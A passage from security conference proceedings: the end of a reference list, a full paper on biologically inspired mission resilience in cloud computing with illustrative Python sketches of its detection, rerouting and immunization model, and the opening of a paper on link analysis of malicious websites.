Kiefer, K.P., 2004. Background on Operation Web Snare. [Online] Available at:<br />
http://www.justice.gov/criminal/fraud/documents/reports/2004/websnare.pdf [Accessed 3 December 2010].<br />
Kortchinsky, K., 2009. Black Hat. [Online] Immunity, Inc. Available at: http://www.blackhat.com/presentations/bh-usa-09/KORTCHINSKY/BHUSA09-Kortchinsky-Cloudburst-SLIDES.pdf [Accessed 16 November 2010].
MacManus, R., 2008. Read Write Web. [Online] Available at:<br />
http://www.readwriteweb.com/archives/survey_48_of_bank_customers_wa.php [Accessed 6 October 2010].<br />
Ollmann, G., 2009. A Botnet by Any Other Name. [Online] Available at:<br />
http://www.securityfocus.com/columnists/501 [Accessed 11 October 2010].<br />
Peterson, V., 2009. Social Design Best Practices. [Online] Available at:<br />
http://wiki.opensocial.org/index.php?title=Social_Design_Best_Practices [Accessed 3 October 2010].<br />
Rutkowska, J., 2008. Black Hat. [Online] Coseinc. Available at: http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Rutkowska.pdf [Accessed 16 November 2010].
Stracener, T., 2008. Securing Widgets and Gadgets in the Web 2.0 World. [Online] Available at: http://blog.cenzic.com/public/blog/208285 [Accessed 6 October 2010].
Vamosi, R., 2008. CNET News. [Online] Available at: http://news.cnet.com/8301-10789_3-10040669-57.html<br />
[Accessed 2 October 2010].<br />
Wang, A., 2009. Javascript Obfuscator . [Online] Available at: http://www.javascriptobfuscator.com/Default.aspx<br />
[Accessed 12 October 2010].<br />
Mission Resilience in Cloud Computing: A Biologically<br />
Inspired Approach<br />
Marco Carvalho¹, Dipankar Dasgupta², Michael Grimaila³ and Carlos Perez¹
¹Florida Institute for Human and Machine Cognition, Pensacola, USA
²University of Memphis, USA
³Air Force Institute of Technology, Wright-Patterson AFB, USA
mcarvalho@ihmc.us<br />
ddasgupt@memphis.edu<br />
michael.grimaila@afit.edu<br />
cperez@ihmc.us<br />
Abstract: With the continuously improving capabilities enabling distributed computing, redundancy and diversity<br />
of services, Cloud environments are becoming increasingly more attractive for missioncritical and military<br />
operations. In such environments, mission assurance and survivability are key enabling factors for deployment,<br />
and must be provided as an intrinsic capability of the environment. Mission-critical frameworks must be safe and<br />
resistant to localized service failures and compromises. Furthermore, they must be able to autonomously learn<br />
and adapt to the environmental challenges and mission requirements. In this paper, we present a biologically<br />
inspired approach to mission survivability in cloud computing environments. Our approach introduces a multilayer<br />
infrastructure that implements threat detection and service failure coupled with distributed assessments of<br />
mission risks, automated re-organization, and re-planning capabilities. Our approach leverages some insights<br />
from developmental biology at the service orchestration level, and takes failures and risk estimations as<br />
weighting functions for resource allocation. The paper first introduces and formulates the proposed concept for a<br />
simple single-mission environment. We then propose a simulated scenario for proof-of-concept demonstration<br />
and preliminary evaluation, and conclude the paper with a brief discussion of results and future work.<br />
Keywords: mission assurance, cloud computing, mission survivability, biologically-inspired<br />
resilience<br />
1. Introduction<br />
Mission survivability is recognized as the capacity to maintain execution, and ensure the successful<br />
completion, of mission-critical systems, even under localized failures and attacks. In<br />
resource-constrained environments, mission survivability includes the prioritization of services and<br />
capabilities to maintain mission goals. Previous research efforts on Mission Assurance have focused<br />
on the estimation of the effects caused by localized failures (or attacks) on the mission and the design of<br />
robust plans for impact minimization. These are challenging and important capabilities that rely on a<br />
mapping of mission tasks to associated components and their corresponding interdependencies.<br />
They generally provide mechanisms for the online evaluation of mission impact, to support human<br />
intervention. There is a need to combine these capabilities with self-managing and resilient<br />
mission-critical frameworks. In the context of this work, a resilient mission-critical infrastructure is defined as a<br />
computational and communications infrastructure capable of maintaining successful mission execution<br />
(mission survivability) and of remaining mission-capable under localized disruptions, which normally<br />
requires the capacity to detect, identify, and recover from attacks.<br />
More generally, an idealized resilient infrastructure must be able to seamlessly absorb local failures or<br />
attacks with no immediate impact to the mission, while also isolating and recovering from the problem<br />
in order to maintain its capacity to effectively execute subsequent missions. Such infrastructures are<br />
expected to be robust and adaptive, capable of learning from experience and improving their own<br />
performance and survivability.<br />
The challenge is that most mission-critical systems have been traditionally designed for cost efficiency<br />
and performance, with little room for component redundancy and diversity (Cohen,<br />
2005). Furthermore, they generally rely on fixed architectures and configurations, favoring<br />
predictability and control, often in lieu of self-management and run-time adaptability. However, in<br />
recent years, the computational landscape for mission-critical systems has changed significantly with<br />
the increasing acceptance of service-oriented architectures as a new paradigm for systems<br />
design, and the introduction of cloud computing environments that provide large-scale, low-cost and<br />
agile commodity computing and storage capabilities. The prospect of highly redundant and adaptive<br />
systems is starting to become a reality, as new adopters begin to leverage the capabilities of these<br />
combined technologies for high-end systems development.<br />
Following several industry initiatives, the United States (US) Government has begun to consider the new<br />
landscape. For example, the Central Intelligence Agency (CIA) has recently reported it is investing in<br />
cloud analytics, cloud widgets and services, cloud security-as-a-service, cloud enterprise data<br />
management and cloud infrastructure, using commercial IT technologies to analyze multi-lingual data,<br />
audio, Twitter tweets, video and text messages that add layers of complexity to intelligence gathering<br />
(Yasin, 2010).<br />
When properly managed and coordinated, the new environment provides the means and tools for<br />
large-scale distributed systems development, including on-demand resource allocation, dynamic<br />
resource management, diversity in services and capabilities, intrinsic replication for data recovery and<br />
several other capabilities. The challenge, however, is to coordinate all these powerful features in<br />
order to enable resilient mission-critical systems.<br />
In this paper we introduce an organic approach to mission resilience in large-scale and adaptive<br />
computational environments. In particular, we focus on the issues of mission continuity and<br />
survivability in response to attacks, as well as runtime system management and adaptation. In section<br />
2 we briefly discuss the proposed challenges and requirements of mission critical systems for SOA<br />
and cloud environments, as well as some background discussions on service discovery and<br />
orchestration. In section 3 we introduce our biologically-inspired approach on organic resilience for<br />
mission-critical systems, followed by some preliminary discussions on the proposed ideas, and<br />
conclusions.<br />
2. Mission critical systems in the cloud<br />
As previously defined, the goal of resilient mission critical systems is to ensure the successful<br />
execution and completion of the mission while remaining mission-capable in response to localized<br />
failures and attacks. In the context of this work we are primarily concerned with the availability and<br />
integrity aspects of the problem. While data exfiltration and privacy are important and challenging<br />
issues in the cloud environments, they are not considered in the scope of this work. We are primarily<br />
concerned with attacks or failures that may directly disrupt the mission. While there are multiple ways<br />
to describe and represent a mission we will consider that a mission can be represented as a set of<br />
workflows, or a set of strictly ordered sequences of tasks, as illustrated in Figure 1.<br />
In this example, a mission is composed of a set of workflows. Each workflow is composed of a set of<br />
ordered tasks and may represent, for instance, a set of image processing steps to be performed on<br />
imagery collected by aerial surveillance vehicles. Each processing step, represented by the tasks (A,<br />
F, G, and A), must be performed in strict order, and services 1, 4 and 7 have been tasked to jointly<br />
execute the workflow. It is important to note that service selection in this example may refer to the<br />
orchestration of services provided by a supporting Service Oriented Architecture (SOA) in the cloud.<br />
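The mission and workflow structure described above can be sketched as a simple data model. This is an illustrative sketch only; the class and function names are our own, not from the paper:<br />

```python
from dataclasses import dataclass, field

@dataclass
class Workflow:
    """A strictly ordered sequence of tasks, e.g. image-processing steps."""
    tasks: list                                      # e.g. ["A", "F", "G", "A"]
    assignment: dict = field(default_factory=dict)   # task index -> service id

@dataclass
class Mission:
    """A mission is a set of workflows to be completed."""
    workflows: list

# One workflow from the example: tasks A, F, G, A executed jointly by
# services 1, 4 and 7 (this particular task-to-service mapping is assumed).
wf = Workflow(tasks=["A", "F", "G", "A"],
              assignment={0: 1, 1: 4, 2: 7, 3: 1})
mission = Mission(workflows=[wf])

def execution_order(workflow):
    """Tasks must run in strict order; return (task, service) pairs."""
    return [(t, workflow.assignment[i]) for i, t in enumerate(workflow.tasks)]

print(execution_order(wf))
```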
Figure 1: Distributed execution of a mission represented as a set of workflows<br />
In Figure 1, mission success requires a minimum rate of images being successfully processed by the<br />
system. Failures or delays of any of the services engaged in the allocation will likely disrupt the<br />
execution of a workflow (i.e. the processing of one image, in this example) and eventually<br />
compromise the mission.<br />
One of the main benefits provided by a cloud-computing environment (and supporting service-oriented<br />
capabilities) is the availability of resources that can be quickly engaged for service execution and<br />
released when no longer needed. The availability of multiple configurations and<br />
implementations for the same type of service (diversity), potentially provided by supporting Service<br />
Oriented Architectures or Software-as-a-Service (SaaS) architectures, is also critically important for<br />
resilient mission execution. Combined, these capabilities can be leveraged to:<br />
Enable a dynamic, elastic and automated computing framework for mission execution. This<br />
capability enables mission-critical systems to dynamically balance resource allocation based on<br />
operational context and mission requirements, without building massive amounts of idle<br />
overcapacity.<br />
Enable the parallel execution of critical tasks on demand, over heterogeneous software (and<br />
emulated hardware) systems.<br />
The process of identifying and organizing the services for task execution (services 1, 4 and 7 in<br />
our example) requires a discovery mechanism and an orchestration process, which may be centralized<br />
or distributed. In most cases, the discovery and orchestration of services are based on protocols<br />
defined for Service Oriented Architectures operating over cloud computing environments. They often<br />
take place before mission execution, and remain fixed until a failure is detected or the mission is<br />
completed. In the following subsections, we provide a brief review of conventional discovery and<br />
orchestration protocols often used in SOAs.<br />
2.1 Service discovery in cloud environments<br />
There are two aspects involved in service discovery on cloud-enabled frameworks: the identification<br />
of services capable of accomplishing a given task, and the identification of computational resources for<br />
executing the service. The first problem is often addressed by conventional service discovery<br />
algorithms for service oriented architectures or software-as-a-service (SaaS) running on cloud<br />
environments. The second part of the problem is generally provided as part of the cloud infrastructure<br />
itself.<br />
The discovery of cloud resources enables dynamic load balancing and scalability by dynamically<br />
moving services and processes running in the cloud. Most cloud resource allocation services offer<br />
either a centralized or hierarchical approach to this problem, but some authors have also proposed<br />
P2P strategies based on Distributed Hash Tables for resource management (Ranjan, 2010). As for<br />
service discovery, service developers often rely on different types of SOA service discovery,<br />
recognizing that some SOA-based services rely on capabilities (e.g. multicast-based discovery) not<br />
necessarily supported by some environments.<br />
One of the earliest service discovery mechanisms available in web service environments was the<br />
Universal Description, Discovery and Integration (UDDI) (Oasis, 2002). UDDI provided a<br />
registry-based approach to service discovery. The approach did not gain strong adoption from industry:<br />
IBM, Microsoft, and SAP closed their public UDDI registries, and Microsoft moved UDDI services<br />
from Windows Server to its service orchestration product, BizTalk. UDDI<br />
may still be used inside organizations to dynamically find services within smaller domains, but the<br />
working group defining the standard completed its work in 2007. WS-Discovery (Oasis, 2009) provides<br />
an alternative approach to service discovery. WS-Discovery is a multicast discovery protocol that reduces the<br />
need for a centralized registry; communication is mainly done using SOAP over UDP. WS-<br />
Discovery has found a niche amongst network device builders, but its adoption in cloud<br />
environments is limited due to the constraints on multicast traffic often imposed in those environments.<br />
Another discovery method that has been gaining attention is DNS-based discovery. Zeroconf, the<br />
protocol implemented by Apple's Bonjour, uses DNS and multicast DNS for<br />
service discovery.<br />
One of the next challenges in service discovery is to enable semantic queries (Papazoglou, 2008),<br />
which involves adding semantic annotations and descriptions of QoS characteristics (Klusch, 2006;<br />
Benatallah, 2003; Lord, 2005). In 2007, the W3C published a recommendation for Semantic<br />
Annotations for WSDL (W3C, 2007) with limited adoption so far.<br />
2.2 Service orchestration in cloud environments<br />
Service Orchestration generally refers to the composition of modular services to execute a task. The<br />
selection of a service is generally based on interface and capability descriptions. A lot of effort in<br />
service orchestration is focused on tools and languages for service and interface descriptions such as<br />
the Business Process Execution Language (BPEL) and its web-services variation (WS-BPEL). In<br />
most cases, service orchestration is provided by centralized services such as Microsoft’s BizTalk<br />
(Microsoft, 2010) amongst others. There are, however, some research efforts to enable peer-to-peer<br />
orchestration (Bradley, 2004). While centralized approaches to service orchestration are generally<br />
more effective at creating complex service structures, they represent a single point of failure in the<br />
process, which is undesirable for mission-critical systems. They also require an external correction to<br />
localized failures, which implies that service-wide disruptions must be perceived before a<br />
reconfiguration of the service composition is triggered. A decentralized strategy for service orchestration, on the<br />
other hand, enables a more robust and emergent approach to the problem. Decentralized strategies are generally unable<br />
to provide the same determinism and timing guarantees as centralized approaches, but if properly<br />
implemented they are better suited to address localized failures and disruptions.<br />
3. Organic computing for mission resilience<br />
In this paper we propose a multi-layer approach to system resilience that builds upon peer-to-peer<br />
discovery and orchestration strategies for mission management. Our approach extends previous<br />
research on resilient tactical infrastructures (Carvalho, 2010). It is biologically inspired in the sense<br />
that we combine insights from developmental biology, diversity and immunology, including<br />
inflammatory and immunization systems. In our formulation these biological traits are desirable<br />
capabilities that can be implemented in multiple ways by leveraging services and features enabled by<br />
cloud computing and our own support services. An illustrative view of the proposed architecture is<br />
shown in Figure 2. The service and resource management capabilities illustrated in the lower part of<br />
the figure are provided by the cloud computing and SOA (or SaaS) support services. The organic<br />
defense framework is implemented as the three upper layers in the system.<br />
Figure 2: Proposed multi-layer defense architecture<br />
For the purposes of the organic defense framework, the resource management and service<br />
management capabilities provide the mechanisms necessary for service response and adaptation.<br />
The organic defense infrastructure builds upon three supporting capabilities:<br />
Nodes and services are capable of identifying a localized failure or attack. This assumption is based<br />
on the fact that nodes engaged in mission-critical applications are frequently interacting with their<br />
neighbors, which allows them to either self-evaluate and identify a failure or a degradation in<br />
performance, or to be notified by their peers of a performance problem.<br />
The defense infrastructure must be able to re-allocate mission critical services to other<br />
(functionally equivalent) services and resources in the system. This capability enables a quick<br />
response to local disruptions and attacks, mitigating their immediate impact to the mission.<br />
The defense layer must be able to replace a service (i.e. shut down a compromised service and<br />
instantiate a new one) with a copy that is functionally equivalent but has a different implementation.<br />
This capability enables the system to recover recently lost capabilities, and to diversify its<br />
configuration in order to develop resiliency and, eventually, immunity against the attack.<br />
Combined, these capabilities enable the multi-layer response infrastructure illustrated in Figure 2. The<br />
first (lower) layer manages the dynamic allocation of resources for mission execution. The second<br />
layer is responsible for the identification, response and potential immunization to localized damages<br />
(i.e. failures or attacks) detected and reported by the first layer. The identification process consists of<br />
correlating the damage with the characteristics and configuration of the affected node. The response<br />
mechanism may include the quarantine, termination or re-initialization of the affected node. The<br />
immunization mechanism provided by the second layer includes the creation of functionally similar<br />
nodes with different software configurations (diversity).<br />
In parallel, the third (and higher) layer coordinates the sharing of information about the attack,<br />
ensuring that a collective response (if appropriate) can be enforced, and that nodes that are<br />
functionally similar to the victim can be reconfigured to prevent a similar attack. A collective response<br />
to an attack may include, for instance, modifications in routing weights to disfavor the use of nodes<br />
that may have been compromised. While mutually supported and coordinated, the proposed<br />
defense infrastructure must be loosely coupled to prevent a cascading failure in the event that one of its<br />
components becomes temporarily impaired or permanently compromised. While, as conceived, the<br />
coordinated operation of all three components is necessary to enable a comprehensive response and<br />
system resilience, each component can also operate independently, with limited performance gains,<br />
ensuring a graceful degradation of the survivability infrastructure itself.<br />
3.1 Damage detection<br />
One of the assumptions of our approach is that individual services are capable of monitoring their own<br />
sensors and performance to detect local damage. In practice, damage detection may be<br />
implemented in multiple ways. In the context of mission continuity, damage is directly related to the<br />
inability of a service to execute its tasks, or a significant degradation in task execution performance<br />
(below acceptable QoS requirements). From that perspective, there is no distinction between damage<br />
caused by localized failures and damage caused by malicious acts. The effects of both events will be similar, as will the<br />
way in which the system responds.<br />
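One way to realize this kind of damage detection is a simple QoS threshold on recent task latency; the following sketch (our own illustration; the window size and threshold semantics are assumptions, not specified in the paper) flags damage whenever the moving average of task execution times exceeds the acceptable bound, regardless of whether the cause is a failure or an attack:<br />

```python
from collections import deque

class DamageDetector:
    """Flags 'damage' when recent task latency degrades past an acceptable
    QoS bound. The cause (failure vs. malicious act) is not distinguished;
    only the degradation itself is observed."""
    def __init__(self, qos_max_latency, window=10):
        self.qos_max_latency = qos_max_latency
        self.samples = deque(maxlen=window)  # sliding window of latencies

    def record(self, task_latency):
        self.samples.append(task_latency)

    def damaged(self):
        if not self.samples:
            return False
        avg = sum(self.samples) / len(self.samples)
        return avg > self.qos_max_latency

det = DamageDetector(qos_max_latency=2.0)
for t in [1.2, 1.5, 1.4]:        # normal operation (1-2 s per task)
    det.record(t)
assert not det.damaged()
for t in [4.0, 5.0, 6.0]:        # progressive degradation under attack
    det.record(t)
print(det.damaged())             # damage is now flagged
```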
Other approaches for damage detection have also included statistical and biologically inspired<br />
techniques based on Danger Theory (Yuan, 2009), and Artificial Immune Systems (Dasgupta, 2002;<br />
Liang, 2006) amongst others. In most cases, damage detection is based on negative signature matching or<br />
anomaly detection associated with misbehaviors or performance degradation. Upon damage<br />
detection, the system will immediately notify the upper layers (for resource management and<br />
response/immunization), while in parallel trying to identify correlated features that could be linked<br />
(perhaps causally) to the event. Previous research efforts have been proposed for this, including the<br />
application of Hidden Markov Models (Cho and Park, 2003; Ourston, Matzner, Stump and Hopkins,<br />
2003), decision trees (Li and Ye, 2001; Abbes, Bouhoula, and Rusinowitch, 2004), and others.<br />
3.2 Resource management for mission continuity<br />
Automatic resource and service re-allocation in response to localized failures is common practice in<br />
Grid environments, and has also been previously proposed for enterprise (Lardieri et al, 2007) and<br />
tactical (Carvalho et al, 2005) environments. However, in general, a change in allocation strategy<br />
happens only after degradation (or failure) has taken place and its impact on the mission has been<br />
noted; there is generally no predictive re-allocation based on an increased risk of attack or failure<br />
learned at runtime from novel attacks.<br />
Our proposed approach leverages and extends such dynamic allocation strategies to enable<br />
proactive task reallocation based on online risk estimation. For our current proof-of-concept mission<br />
management layer implementation, we have adopted a greedy distributed coordination algorithm<br />
using a generalized cost metric per node for resource management. When a workflow is received,<br />
each node makes a local decision about task execution based on current local cost estimates. If the<br />
local cost becomes less attractive than a neighbor's estimated cost, the workflow is forwarded to<br />
the node with the lowest estimated cost. Cost information is shared between nodes involved in a joint<br />
mission as part of workflow exchange messages.<br />
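The greedy local decision above can be sketched as follows. This is a minimal illustration under our own assumptions (the paper leaves the generalized cost metric abstract, and the function name is ours):<br />

```python
def route_workflow(local_id, local_cost, neighbor_costs):
    """Greedy local decision: execute the workflow here unless a neighbor
    advertises a lower estimated cost, in which case forward it to the
    cheapest node. neighbor_costs maps neighbor id -> estimated cost,
    as shared in workflow exchange messages."""
    best_id, best_cost = local_id, local_cost
    for nid, cost in neighbor_costs.items():
        if cost < best_cost:
            best_id, best_cost = nid, cost
    return best_id  # node chosen to execute (or receive) the workflow

# Node 1 keeps the workflow when its own cost estimate is lowest...
assert route_workflow(1, 0.4, {2: 0.9, 3: 0.7}) == 1
# ...but forwards it when a neighbor's estimate is more attractive.
print(route_workflow(1, 0.8, {2: 0.5, 3: 0.7}))
```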
Attacks and failures may be detected indirectly, through their effects on the mission (see 3.1). To<br />
simplify our model, we currently consider the degradation of a task as causing a direct impact on<br />
mission performance. There are, however, related research efforts on mission mapping (Musman et<br />
al., 2010; Sorrel et al., 2008; Grimaila, 2008) that can provide a better assessment of the impact of<br />
localized failures to the overall mission.<br />
In general, the approach for detection may rely on a number of sources that include performance<br />
monitoring, anomaly detection, or resource utilization monitoring. These are all metrics that may be<br />
used to detect violations in resource utilization policies, or deviations from pre-defined (or learned, in<br />
the case of anomaly) QoS requirements for task execution.<br />
Dynamic resource management for mission continuity focuses on isolating the area (i.e. node, or<br />
services) associated with the damage to minimize the impact on mission execution. The re-allocation<br />
of resources and re-organization of tasks is coordinated through distributed, self-organizing<br />
algorithms and may take place at different scales – that is, from very localized modifications involving a<br />
single service that has reported damage, to larger-scale changes involving multiple services. An<br />
analog to this approach can be found in developmental biology, where cells (and other structures at<br />
different hierarchical levels) signal each other to induce a differentiation that will enable a needed<br />
capability. In our approach, mission-aware services will perceive the lack of the damaged capability and<br />
will signal other services (as part of a distributed orchestration mechanism) to engage the new<br />
capabilities.<br />
3.3 Response and immunization<br />
The response and immunization mechanisms are responsible for both a short-term response to the<br />
reported damage and a longer-term mitigation strategy to future attacks of the same type. The<br />
intuitive response to a damaged component that can be replaced by alternative services in the<br />
environment is to immediately terminate the affected service. However, depending on the type of<br />
attack, the response and immunization layer may benefit from maintaining a potentially compromised<br />
node in operation. The goal is to identify the potential causes of the effects perceived as damage, and<br />
possibly correlate those events with the configuration of the node. This rudimentary approach to<br />
vulnerability estimation is useful in providing a hint to other services in the system that may be equally<br />
vulnerable to the same types of attacks. In our proposed infrastructure, the response and<br />
immunization mechanism work together to allow some time for the system to build such correlations<br />
before shutting down the node as a response to the damage. In order to do that without affecting the<br />
mission, a duplicate of workflows (which have been re-allocated to alternative nodes in response to<br />
the damage) is still sent to the damaged node for processing, but it is also tagged to be ignored by<br />
subsequent processing services. This allows the damaged component to remain ‘active’ for the<br />
characterization and immunization tasks.<br />
4. Preliminary experimental results<br />
A first proof of concept of the proposed approach was implemented and tested in a simulated<br />
networked environment using NS3. Simulated scenarios allow for larger scale experiments, and<br />
controlled attack conditions, facilitating the evaluation and analysis of the proposed algorithm. For the<br />
purposes of our first tests we considered a single service running on each node of our conceptual<br />
network, so the terms ‘service’ and ‘node’ are used interchangeably in our discussions. We also<br />
disregarded the complexities associated with service descriptions and interfaces. We focused, instead,<br />
on the survivability and resilience aspects of the proposed approach. In our simulated scenario, each<br />
workflow is composed of 3 tasks, and a mission is composed of 400 workflows. There are 5 nodes (or<br />
services) executing independent parallel missions. In addition to those, there are 9 other nodes<br />
available to be engaged for task execution, and 6 additional nodes playing the role of<br />
attackers.<br />
Each node has a short sequence of bits (arbitrarily chosen to be a 4-bit string in our simulations) that<br />
represents its configuration. For example, the sequence 0000 could indicate a Linux-based host<br />
running the Apache Web Server of a given version, with other specific libraries and configurations. A<br />
different sequence of bits would represent an alternative configuration for the same service capability.<br />
The execution of each task in the workflow takes between 1 and 2 seconds under normal operational<br />
conditions. The simulation runs for 1200 seconds, and the attacking nodes become active only after<br />
200 seconds of simulation. At that point, each attacking node starts to launch attacks to a randomly<br />
selected victim every 6 seconds. Every task-processing node that receives an attack packet will<br />
match that attack against its own configuration (4-bit string). If at least a 75% match is found, the node<br />
accepts the attack and progressively degrades its performance.<br />
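The 75% matching rule can be expressed directly (a sketch of the simulation rule described above; the function name and the position-wise matching interpretation are our own assumptions):<br />

```python
def attack_matches(config, attack, threshold=0.75):
    """A node accepts an attack if its configuration string matches the
    attack signature in at least 75% of bit positions (at least 3 of the
    4 bits in our scenario), after which its performance degrades."""
    assert len(config) == len(attack)
    matching = sum(c == a for c, a in zip(config, attack))
    return matching / len(config) >= threshold

assert attack_matches("0000", "0001")      # 3/4 bits match -> vulnerable
assert not attack_matches("0000", "0011")  # 2/4 bits match -> resistant
print(attack_matches("0000", "0000"))      # exact match -> vulnerable
```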
The scenario was executed with 20 different random seeds and the results were averaged across those<br />
runs. The metric of interest for comparing results is the percentage of completed workflows at any<br />
given moment of the simulation. Two baselines representing the upper and lower operational<br />
boundaries of the system were computed. The first baseline, identified in the chart as “Clean<br />
Baseline” (Figure 3), represents the performance of the system when there are no attacks during the<br />
whole simulation. The second baseline, identified in the chart as “Attack Baseline” (Figure 3),<br />
represents the performance of the system under attack but without any corrective measures. As<br />
previously discussed, an organic response to the degrading attacks should include both a recovery<br />
and adaptation component. The first strategy tested was a simple recovery strategy, consisting of<br />
restarting the compromised node from a previously known safe image. This strategy was designed to simply<br />
mitigate the short-term effects of the problem. Figure 3 shows the performance of this strategy,<br />
identified as “Simple Reset” in the chart.<br />
Figure 3: Mission performance in different operation conditions<br />
A second strategy that was tested included, in addition to the short-term response, an adaptation<br />
strategy to enhance the resilience of the system to subsequent attacks. The adaptation strategy can<br />
take multiple approaches. One approach consists of randomizing the configuration of<br />
re-instantiated services and nodes. A second approach is to provide an immunization capability that<br />
will drive mutations of re-instantiated services to make them resistant to previous attacks. In our<br />
experiments, we opted for the immunization strategy. The figure also shows the performance of<br />
this strategy, identified as “Immunization” in the chart.<br />
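The immunization-driven mutation can be sketched as flipping configuration bits until the node no longer matches the attack signature at the 75% threshold. The actual mutation policy is left unspecified in the paper, so the bit-flipping order below is purely our own illustrative choice:<br />

```python
def immunize(config, attack, threshold=0.75):
    """Mutate a node's 4-bit configuration until it no longer matches the
    attack signature at the 75% threshold. Each step flips one bit that
    currently matches the attack (an assumed, minimal mutation policy)."""
    bits = list(config)
    for i in range(len(bits)):
        matching = sum(b == a for b, a in zip(bits, attack))
        if matching / len(bits) < threshold:
            break                      # node is now resistant
        if bits[i] == attack[i]:
            bits[i] = "1" if bits[i] == "0" else "0"
    return "".join(bits)

# A node with configuration 0000 hit by attack signature 0000 mutates
# until fewer than 75% of its bits match; the mutated string would then
# be announced so that "similar" nodes can mutate pre-emptively.
mutated = immunize("0000", "0000")
matching = sum(b == a for b, a in zip(mutated, "0000"))
assert matching / 4 < 0.75     # the re-instantiated node resists the attack
print(mutated)
```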
Figure 4: Statistical significance of the performance gains due to the immunization strategy<br />
In the “Simple Reset” strategy, nodes detect and identify the attack and then reboot from a previously<br />
known safe state. The attack detection happens indirectly (through the effects of the attack), and the<br />
identification happens by correlating the detection with the current state of the node. This process<br />
takes some time, during which the services of the node are degraded. In the “Immunization” strategy,<br />
the nodes additionally identify a “mutation” strategy that is likely to make them less vulnerable to the same<br />
attack. For our simulated scenario, the state of the node is represented by a 4-bit string that defines<br />
how vulnerable a node is to a given attack. The immunization process additionally involves<br />
announcing the 4-bit string to other nodes, which drives “similar” nodes to mutate in order to<br />
become resistant to the attack. In the scenario illustrated in Figure 3, the “Immunization” strategy starts with<br />
results close to those of the “Simple Reset” strategy, but then improves, approaching the upper operational<br />
boundary of the system (“Clean Baseline”). Figure 4 shows how the p-value changes over time<br />
for a t-test of the difference in the percentage of completed missions between the “Immunization” and “Simple<br />
Reset” strategies. After approximately 300 seconds of simulation, the difference in performance<br />
between the “Immunization” and “Simple Reset” strategies becomes statistically significant. While<br />
very simplified at this point, our initial results seem to indicate that an immunization-based strategy is more<br />
effective than a reactive approach based on a simple node reset. Under the simplifying assumption that<br />
immunization has a fixed cost, fast recovery from continuous attacks will eventually be less effective<br />
than a slower, but more permanent, recovery from the same kinds of attacks.<br />
5. Conclusions<br />
In this paper we have described a three-layer concept for system resilience in distributed<br />
computational environments such as those found in cloud computing and service oriented<br />
architectures. Our proposal is based on the notions of self-organization and self-maintenance,<br />
leveraging distributed coordination algorithms for mission continuity. After a brief discussion on the<br />
capabilities enabled by cloud computing, service oriented architectures and some of their core<br />
services, we introduce our organic resilience approach. We define a three-layer defense infrastructure<br />
responsible for detecting damage (i.e. failures or attacks), maintaining mission execution, and<br />
identifying a short-term response and an immunization path for the problem. We also defined a very<br />
simplified scenario to illustrate the basic concepts of the proposed approach. In our simulations,<br />
services are equated to computational nodes in a distributed environment to simplify the simulations<br />
and to allow the use of a network simulator as the basis for test and evaluation. Our goal with these initial<br />
experiments was to illustrate the proposed concept, rather than making any quantitative claims. As<br />
part of our future work in this project we plan to more rigorously define the adaptation and<br />
diversification algorithms, and to better evaluate the agility, as well as the overhead and the<br />
effectiveness of the proposed approach.<br />
Acknowledgments<br />
This material is partially based upon work supported by the Department of Energy National Energy<br />
Technology Laboratory under Award Number(s) DE-OE0000511.<br />
Disclaimer: Parts of this paper were prepared as an account of work sponsored by an agency of the<br />
United States Government. Neither the United States Government nor any agency thereof, nor any of<br />
their employees, makes any warranty, express or implied, or assumes any legal liability or<br />
responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or<br />
process disclosed, or represents that its use would not infringe privately owned rights. Reference<br />
herein to any specific commercial product, process, or service by trade name, trademark,<br />
manufacturer, or otherwise does not necessarily constitute or imply its endorsement,<br />
recommendation, or favoring by the United States Government or any agency thereof. The views and<br />
opinions of authors expressed herein do not necessarily state or reflect those of the United States<br />
Government or any agency thereof.
Link Analysis and Link Visualization of Malicious Websites<br />
Manoj Cherukuri and Srinivas Mukkamala<br />
(ICASA/CAaNES), New Mexico Institute of Mining and Technology, USA
manoj@cs.nmt.edu<br />
srinivas@cs.nmt.edu<br />
Abstract: In this paper we present web crawling, meta-searches, geolocation tools, and computational intelligence techniques to assess the characteristics of a cyber-incident: whether an incident is likely to be caused by a certain group, the geographical location of the source, the intent of the attack, and useful behavioral aspects of the attack. The malicious websites extracted from the identified sources acted as seeds for our crawler and were crawled up to two hops, traversing all the hyperlinks emerging from these pages. After crawling, all the websites were translated to geographic locations based on the location of the server on which each website is hosted, using Internet Protocol (IP) address to geographical location mapping databases. We applied social networking analysis techniques to the link structure of the malicious websites to characterize their properties and compared them with those of legitimate websites. We identified the potential sources, or websites that publish malicious websites, using meta-searches. Our approach revealed that the behavior of the malicious websites with respect to their indegrees, outdegrees and clustering coefficient differs from that of legitimate websites, and that some malicious websites act as promoters for other malicious websites. The link visualization showed that the links traversing across the malicious websites are not confined to the region where the website is hosted.
Keywords: link analysis, link visualization, malicious websites, social networking analysis techniques<br />
1. Introduction<br />
The increase in the number of internet users and in bandwidth has resulted in a proliferation of websites. World Internet Usage and Population Statistics (2010) stated that, as of June 2010, there were about 2 billion internet users throughout the world, a growth rate of about 440% over a decade. The December 2009 Web Server Survey (2009) affirmed that there were about 240 million websites hosted all over the world. The prospective growth rate of internet users and their huge number created a new means of making revenue for attackers, the people who carry out malicious activities on the web. This huge market being exploited by the attackers is often referred to as the Underground Economy. Cheng (2008) estimated that, as of 2008, the market for the underground economy was about US$276 million, with a potential of billions of dollars. Luvender (2010) stated that, as of April 2010, the United States alone faces a loss of about $200 billion per year.
A malicious website is a website which hosts malicious code to attack the client's machine or spoofs the client by presenting a look-alike of a legitimate site. The malicious script on the webpage is executed on loading the page, and a malicious script or file is installed without the user's consent by exploiting a vulnerability of an application or by other possible means. The installed program reports the user's sensitive data to the attacker. The underground economy has its own organizational hierarchy, with different sets of people (based on their roles) working collaboratively to exploit its potential. The important roles contributing to the hierarchy of the underground economy, as suggested by Zhuge et al. (2007), are Virus Writers, Website Masters, Envelope Stealers, Virtual Asset Stealers and Virtual Asset Sellers. Virus writers are responsible for writing the malicious code. Website masters build up websites and attract traffic to them using approaches such as search engine optimization, blogging and spam. The terms website masters and traffic sellers are used interchangeably in this document. Envelope stealers purchase the malicious code and web traffic from the virus writers and website masters respectively; they capture the raw data from the victim's machine and sell it to the virtual asset stealers. Virtual asset stealers extract the useful information from the purchased raw data to convert it into a virtual asset, and sell the virtual assets to the virtual asset sellers, who in turn sell them to clients based on the type of asset.
